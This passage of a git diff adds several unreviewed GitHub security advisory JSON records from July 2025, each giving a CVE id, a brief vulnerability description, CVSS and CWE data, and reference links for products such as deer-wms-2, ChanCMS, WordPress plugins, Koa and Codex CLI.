"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8125" + }, + { + "type": "WEB", + "url": "https://gitee.com/deerwms/deer-wms-2/issues/ICLRE9" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317510" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317510" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.619693" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T02:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-6g2p-hv5m-576f/GHSA-6g2p-hv5m-576f.json b/advisories/unreviewed/2025/07/GHSA-6g2p-hv5m-576f/GHSA-6g2p-hv5m-576f.json new file mode 100644 index 0000000000000..1cd5f66e305b2 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6g2p-hv5m-576f/GHSA-6g2p-hv5m-576f.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6g2p-hv5m-576f", + "modified": "2025-07-25T03:30:27Z", + "published": "2025-07-25T03:30:27Z", + "aliases": [ + "CVE-2025-0253" + ], + "details": "HCL IEM is affected by a cookie attribute not set vulnerability due to inconsistency of certain security-related configurations which could increase exposure to potential vulnerabilities.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0253" + }, + { + "type": "WEB", + "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0122368" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-384" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T01:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-c2q6-w8rj-wvhw/GHSA-c2q6-w8rj-wvhw.json b/advisories/unreviewed/2025/07/GHSA-c2q6-w8rj-wvhw/GHSA-c2q6-w8rj-wvhw.json new file mode 100644 index 0000000000000..79b915de98440 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-c2q6-w8rj-wvhw/GHSA-c2q6-w8rj-wvhw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c2q6-w8rj-wvhw", + "modified": "2025-07-25T03:30:27Z", + "published": "2025-07-25T03:30:27Z", + "aliases": [ + "CVE-2025-54567" + ], + "details": "hw/pci/pcie_sriov.c in QEMU through 10.0.3 mishandles the VF Enable bit write mask, a related issue to CVE-2024-26327.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54567" + }, + { + "type": "WEB", + "url": "https://lore.kernel.org/qemu-devel/20250713-wmask-v1-1-4c744cdb32c0@rsg.ci.i.u-tokyo.ac.jp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-684" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T03:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-j2v5-7544-9fpc/GHSA-j2v5-7544-9fpc.json b/advisories/unreviewed/2025/07/GHSA-j2v5-7544-9fpc/GHSA-j2v5-7544-9fpc.json new file mode 100644 index 0000000000000..0ce96eff850ac --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-j2v5-7544-9fpc/GHSA-j2v5-7544-9fpc.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j2v5-7544-9fpc", + "modified": "2025-07-25T03:30:27Z", + "published": "2025-07-25T03:30:27Z", + "aliases": [ + "CVE-2025-0252" + ], + "details": "HCL IEM is affected by a password in cleartext vulnerability.  Sensitive information is transmitted without adequate protection, potentially exposing it to unauthorized access during transit.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0252" + }, + { + "type": "WEB", + "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0122368" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-319" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T01:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-m2q6-2g6v-7xqv/GHSA-m2q6-2g6v-7xqv.json b/advisories/unreviewed/2025/07/GHSA-m2q6-2g6v-7xqv/GHSA-m2q6-2g6v-7xqv.json new file mode 100644 index 0000000000000..c40d6d4602bea --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-m2q6-2g6v-7xqv/GHSA-m2q6-2g6v-7xqv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m2q6-2g6v-7xqv", + "modified": "2025-07-25T03:30:27Z", + "published": "2025-07-25T03:30:26Z", + "aliases": [ + "CVE-2025-0251" + ], + "details": "HCL IEM is affected by a concurrent login vulnerability.  The application allows multiple concurrent sessions using the same user credentials, which may introduce security risks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0251" + }, + { + "type": "WEB", + "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0122368" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-384" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T01:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-q6hp-29g8-7j6j/GHSA-q6hp-29g8-7j6j.json b/advisories/unreviewed/2025/07/GHSA-q6hp-29g8-7j6j/GHSA-q6hp-29g8-7j6j.json new file mode 100644 index 0000000000000..5764daa4e0089 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-q6hp-29g8-7j6j/GHSA-q6hp-29g8-7j6j.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q6hp-29g8-7j6j", + "modified": "2025-07-25T03:30:27Z", + "published": "2025-07-25T03:30:27Z", + "aliases": [ + "CVE-2025-54558" + ], + "details": "OpenAI Codex CLI before 0.9.0 auto-approves ripgrep (aka rg) execution even with the --pre or --hostname-bin or --search-zip or -z flag.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54558" + }, + { + "type": "WEB", + "url": "https://github.com/openai/codex/pull/1644" + }, + { + "type": "WEB", + "url": "https://github.com/openai/codex/commit/6cf4b96f9dbbef8a94acc1ff703eb118481514d8" + }, + { + "type": "WEB", + "url": "https://github.com/openai/codex/compare/rust-v0.8.0...rust-v0.9.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-829" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T02:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-rq48-53j8-jrwr/GHSA-rq48-53j8-jrwr.json b/advisories/unreviewed/2025/07/GHSA-rq48-53j8-jrwr/GHSA-rq48-53j8-jrwr.json new file mode 100644 index 0000000000000..f527980c48c7f --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-rq48-53j8-jrwr/GHSA-rq48-53j8-jrwr.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rq48-53j8-jrwr", + "modified": "2025-07-25T03:30:27Z", + "published": "2025-07-25T03:30:27Z", + "aliases": [ + "CVE-2025-8126" + ], + "details": "A vulnerability classified as critical has been found in deerwms deer-wms-2 up to 3.3. This affects an unknown part of the file /system/user/export. The manipulation of the argument params[dataScope] leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8126" + }, + { + "type": "WEB", + "url": "https://gitee.com/deerwms/deer-wms-2/issues/ICLQUE" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317511" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317511" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.619694" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T03:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-xhhw-h278-mxj8/GHSA-xhhw-h278-mxj8.json b/advisories/unreviewed/2025/07/GHSA-xhhw-h278-mxj8/GHSA-xhhw-h278-mxj8.json new file mode 100644 index 0000000000000..117c709583fd8 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-xhhw-h278-mxj8/GHSA-xhhw-h278-mxj8.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xhhw-h278-mxj8", + "modified": "2025-07-25T03:30:27Z", + "published": "2025-07-25T03:30:27Z", + "aliases": [ + "CVE-2015-10144" + ], + "details": "The Responsive Thumbnail Slider plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type sanitization in the via the image uploader in versions up to 1.0.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files on the affected sites server using a double extension which may make remote code execution possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-10144" + }, + { + "type": "WEB", + "url": "https://cxsecurity.com/issue/WLB-2015080170" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb" + }, + { + "type": "WEB", + "url": "https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-thumbnail-carousel-slider-arbitrary-file-upload-1-0" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/37998" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6c396ae6-d34c-4554-b670-28868dc136a5?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T03:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-xwcj-w2w2-2g7c/GHSA-xwcj-w2w2-2g7c.json b/advisories/unreviewed/2025/07/GHSA-xwcj-w2w2-2g7c/GHSA-xwcj-w2w2-2g7c.json new file mode 100644 index 0000000000000..b83f81321772c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-xwcj-w2w2-2g7c/GHSA-xwcj-w2w2-2g7c.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xwcj-w2w2-2g7c", + "modified": "2025-07-25T03:30:27Z", + "published": "2025-07-25T03:30:27Z", + "aliases": [ + "CVE-2019-25224" + ], + "details": "The WP Database Backup plugin for WordPress is vulnerable to OS Command Injection in versions before 5.2 via the mysqldump function. This vulnerability allows unauthenticated attackers to execute arbitrary commands on the host operating system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25224" + }, + { + "type": "WEB", + "url": "https://blog.sucuri.net/2019/06/os-command-injection-in-wp-database-backup.html" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/153781" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/2078035/wp-database-backup" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/wp_db_backup_rce.rb" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d21cf285-9d75-43a2-9e81-67116f0bf896?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T03:15:32Z" + } +} \ No newline at end of file From aa51506eb4cf4b9e6155a4d9d0356d34a7c4ebe0 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 25 Jul 2025 06:32:13 +0000 Subject: [PATCH 142/323] Publish Advisories GHSA-8pgc-2j25-rwg6 GHSA-9652-rq4r-3qr4 GHSA-9m94-f2fv-mc3f GHSA-cf2h-w5g3-4chc GHSA-f46f-fjf4-h4m2 GHSA-m2xg-c7hm-9g82 GHSA-mvw6-62qv-vmqf GHSA-w466-769j-w8jf GHSA-whhf-v5j3-85q3 GHSA-wxq5-cqj8-p4vx --- .../GHSA-8pgc-2j25-rwg6.json | 40 ++++++++++++ .../GHSA-9652-rq4r-3qr4.json | 64 +++++++++++++++++++ .../GHSA-9m94-f2fv-mc3f.json | 52 +++++++++++++++ .../GHSA-cf2h-w5g3-4chc.json | 56 ++++++++++++++++ .../GHSA-f46f-fjf4-h4m2.json | 7 +- .../GHSA-m2xg-c7hm-9g82.json | 29 +++++++++ .../GHSA-mvw6-62qv-vmqf.json | 56 ++++++++++++++++ .../GHSA-w466-769j-w8jf.json | 64 +++++++++++++++++++ .../GHSA-whhf-v5j3-85q3.json | 56 ++++++++++++++++ .../GHSA-wxq5-cqj8-p4vx.json | 60 +++++++++++++++++ 10 files changed, 483 insertions(+), 1 deletion(-) create mode 100644 advisories/unreviewed/2025/07/GHSA-8pgc-2j25-rwg6/GHSA-8pgc-2j25-rwg6.json create mode 100644 advisories/unreviewed/2025/07/GHSA-9652-rq4r-3qr4/GHSA-9652-rq4r-3qr4.json create mode 100644 advisories/unreviewed/2025/07/GHSA-9m94-f2fv-mc3f/GHSA-9m94-f2fv-mc3f.json create mode 100644 advisories/unreviewed/2025/07/GHSA-cf2h-w5g3-4chc/GHSA-cf2h-w5g3-4chc.json create mode 100644 advisories/unreviewed/2025/07/GHSA-m2xg-c7hm-9g82/GHSA-m2xg-c7hm-9g82.json create mode 100644 advisories/unreviewed/2025/07/GHSA-mvw6-62qv-vmqf/GHSA-mvw6-62qv-vmqf.json create mode 100644 advisories/unreviewed/2025/07/GHSA-w466-769j-w8jf/GHSA-w466-769j-w8jf.json create mode 100644 advisories/unreviewed/2025/07/GHSA-whhf-v5j3-85q3/GHSA-whhf-v5j3-85q3.json create mode 100644 advisories/unreviewed/2025/07/GHSA-wxq5-cqj8-p4vx/GHSA-wxq5-cqj8-p4vx.json diff --git a/advisories/unreviewed/2025/07/GHSA-8pgc-2j25-rwg6/GHSA-8pgc-2j25-rwg6.json b/advisories/unreviewed/2025/07/GHSA-8pgc-2j25-rwg6/GHSA-8pgc-2j25-rwg6.json new file mode 100644 index 0000000000000..2a18b106b6b66 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-8pgc-2j25-rwg6/GHSA-8pgc-2j25-rwg6.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8pgc-2j25-rwg6", + "modified": "2025-07-25T06:30:30Z", + "published": "2025-07-25T06:30:30Z", + "aliases": [ + "CVE-2025-54568" + ], + "details": "Akamai Rate Control alpha before 2025 allows attackers to send requests above the stipulated thresholds because the rate is measured separately for each edge node.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54568" + }, + { + "type": "WEB", + "url": "https://github.com/geo-chen/Akamai/blob/main/Edge%20Hopping.md" + }, + { + "type": "WEB", + "url": "http://techdocs.akamai.com/app-api-protector/docs/improved-rate-accounting" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-684" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T04:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9652-rq4r-3qr4/GHSA-9652-rq4r-3qr4.json b/advisories/unreviewed/2025/07/GHSA-9652-rq4r-3qr4/GHSA-9652-rq4r-3qr4.json new file mode 100644 index 0000000000000..525562a357395 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-9652-rq4r-3qr4/GHSA-9652-rq4r-3qr4.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9652-rq4r-3qr4", + "modified": "2025-07-25T06:30:30Z", + "published": "2025-07-25T06:30:30Z", + "aliases": [ + "CVE-2025-8132" + ], + "details": "A vulnerability was found in yanyutao0402 ChanCMS up to 3.1.2. It has been rated as critical. Affected by this issue is the function delfile of the file app/extend/utils.js. The manipulation leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.1.3 is able to address this issue. The name of the patch is c8a282bf02a62b59ec60b4699e91c51aff2ee9cd. It is recommended to upgrade the affected component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8132" + }, + { + "type": "WEB", + "url": "https://gitee.com/yanyutao0402/ChanCMS/commit/c8a282bf02a62b59ec60b4699e91c51aff2ee9cd" + }, + { + "type": "WEB", + "url": "https://gitee.com/yanyutao0402/ChanCMS/issues/ICLOT8" + }, + { + "type": "WEB", + "url": "https://gitee.com/yanyutao0402/ChanCMS/issues/ICLOT8#note_43945209_link" + }, + { + "type": "WEB", + "url": "https://gitee.com/yanyutao0402/ChanCMS/releases/tag/V3.1.3" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317528" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317528" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.619776" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T05:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9m94-f2fv-mc3f/GHSA-9m94-f2fv-mc3f.json b/advisories/unreviewed/2025/07/GHSA-9m94-f2fv-mc3f/GHSA-9m94-f2fv-mc3f.json new file mode 100644 index 0000000000000..529d2e375e4a7 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-9m94-f2fv-mc3f/GHSA-9m94-f2fv-mc3f.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9m94-f2fv-mc3f", + "modified": "2025-07-25T06:30:30Z", + "published": "2025-07-25T06:30:30Z", + "aliases": [ + "CVE-2025-8127" + ], + "details": "A vulnerability classified as critical was found in deerwms deer-wms-2 up to 3.3. This vulnerability affects unknown code of the file /system/user/list. The manipulation of the argument params[dataScope] leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8127" + }, + { + "type": "WEB", + "url": "https://gitee.com/deerwms/deer-wms-2/issues/ICLQT8" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317512" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317512" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.619695" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T04:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-cf2h-w5g3-4chc/GHSA-cf2h-w5g3-4chc.json b/advisories/unreviewed/2025/07/GHSA-cf2h-w5g3-4chc/GHSA-cf2h-w5g3-4chc.json new file mode 100644 index 0000000000000..e84de35e5f0bb --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-cf2h-w5g3-4chc/GHSA-cf2h-w5g3-4chc.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cf2h-w5g3-4chc", + "modified": "2025-07-25T06:30:30Z", + "published": "2025-07-25T06:30:30Z", + "aliases": [ + "CVE-2025-8128" + ], + "details": "A vulnerability, which was classified as critical, has been found in zhousg letao up to 7d8df0386a65228476290949e0413de48f7fbe98. This issue affects some unknown processing of the file routes\\bf\\product.js. The manipulation of the argument pictrdtz leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8128" + }, + { + "type": "WEB", + "url": "https://github.com/zhousg/letao/issues/13" + }, + { + "type": "WEB", + "url": "https://github.com/zhousg/letao/issues/13#issue-2977017027" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317513" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317513" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.619740" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T04:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-f46f-fjf4-h4m2/GHSA-f46f-fjf4-h4m2.json b/advisories/unreviewed/2025/07/GHSA-f46f-fjf4-h4m2/GHSA-f46f-fjf4-h4m2.json index dd2d9524f6b93..37490a6daa7c7 100644 --- a/advisories/unreviewed/2025/07/GHSA-f46f-fjf4-h4m2/GHSA-f46f-fjf4-h4m2.json +++ b/advisories/unreviewed/2025/07/GHSA-f46f-fjf4-h4m2/GHSA-f46f-fjf4-h4m2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f46f-fjf4-h4m2", - "modified": "2025-07-23T21:36:45Z", + "modified": "2025-07-25T06:30:30Z", "published": "2025-07-23T21:36:45Z", "aliases": [ "CVE-2025-46686" @@ -15,6 +15,10 @@ ], "affected": [], "references": [ + { + "type": "WEB", + "url": "https://github.com/redis/redis/security/advisories/GHSA-2r7g-8hpc-rpq9" + }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46686" @@ -30,6 +34,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-401", "CWE-789" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2025/07/GHSA-m2xg-c7hm-9g82/GHSA-m2xg-c7hm-9g82.json b/advisories/unreviewed/2025/07/GHSA-m2xg-c7hm-9g82/GHSA-m2xg-c7hm-9g82.json new file mode 100644 index 0000000000000..48d08ed1746d2 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-m2xg-c7hm-9g82/GHSA-m2xg-c7hm-9g82.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m2xg-c7hm-9g82", + "modified": "2025-07-25T06:30:30Z", + "published": "2025-07-25T06:30:30Z", + "aliases": [ + "CVE-2025-7022" + ], + "details": "The My Reservation System WordPress plugin through 2.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7022" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/c1021763-075b-40c7-801d-b5519828aabe" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T06:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-mvw6-62qv-vmqf/GHSA-mvw6-62qv-vmqf.json b/advisories/unreviewed/2025/07/GHSA-mvw6-62qv-vmqf/GHSA-mvw6-62qv-vmqf.json new file mode 100644 index 0000000000000..70c174e7af4cf --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-mvw6-62qv-vmqf/GHSA-mvw6-62qv-vmqf.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mvw6-62qv-vmqf", + "modified": "2025-07-25T06:30:30Z", + "published": "2025-07-25T06:30:30Z", + "aliases": [ + "CVE-2025-8129" + ], + "details": "A vulnerability, which was classified as problematic, was found in KoaJS Koa up to 3.0.0. Affected is the function back in the library lib/response.js of the component HTTP Header Handler. The manipulation of the argument Referrer leads to open redirect. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8129" + }, + { + "type": "WEB", + "url": "https://github.com/koajs/koa/issues/1892" + }, + { + "type": "WEB", + "url": "https://github.com/koajs/koa/issues/1892#issue-3213028583" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317514" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317514" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.619741" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T05:15:36Z" + } +} \ No newline at end of file diff --git 